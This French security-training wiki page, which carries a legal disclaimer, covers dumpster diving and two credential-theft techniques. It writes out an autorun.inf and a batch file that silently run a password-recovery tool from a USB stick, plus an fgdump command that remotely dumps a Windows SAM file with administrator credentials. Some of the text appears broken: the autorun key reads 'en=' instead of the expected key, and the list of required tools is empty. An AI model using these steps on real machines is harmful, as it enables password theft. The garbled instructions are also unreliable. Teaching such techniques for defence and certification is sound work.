Dumpster Diving

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
Domaine Vol d'identifiants
Vecteurs Poubelles, clé USB piégée, dump SAM
Voir aussi Shoulder surfing · Wire sniffing · PTH-PassTheHash

Le dumpster diving (« fouille de poubelles ») consiste à récupérer des informations sensibles en fouillant les rebuts d'une organisation. Cette page couvre aussi deux techniques connexes de vol d'identifiants : la clé USB piégée et le dump du fichier SAM.

Présentation

Rechercher des informations sensibles dans :

  • les poubelles des utilisateurs ;
  • les poubelles des imprimantes ;
  • les bureaux des utilisateurs.

Voler des mots de passe avec une clé USB

Matériel et logiciel nécessaires :

[autorun]
en=launch.bat
  • contenu de launch.bat :
start pspv.exe /stext pspv.txt
  • insérer la clé USB dans la machine et déclencher l'autorun.

pspv.exe s'exécute en arrière-plan et écrit les mots de passe récupérés dans le fichier .txt sur la clé USB.

Dumper le fichier SAM

  • PwDump7.exe — dump le fichier SAM en local.
  • Fgdump.exe — dump le fichier SAM à distance ; nécessite les droits administrateur.
fgdump.exe -h 192.168.0.1 -u AdministratorUser -p P@$$w0rd

Voir aussi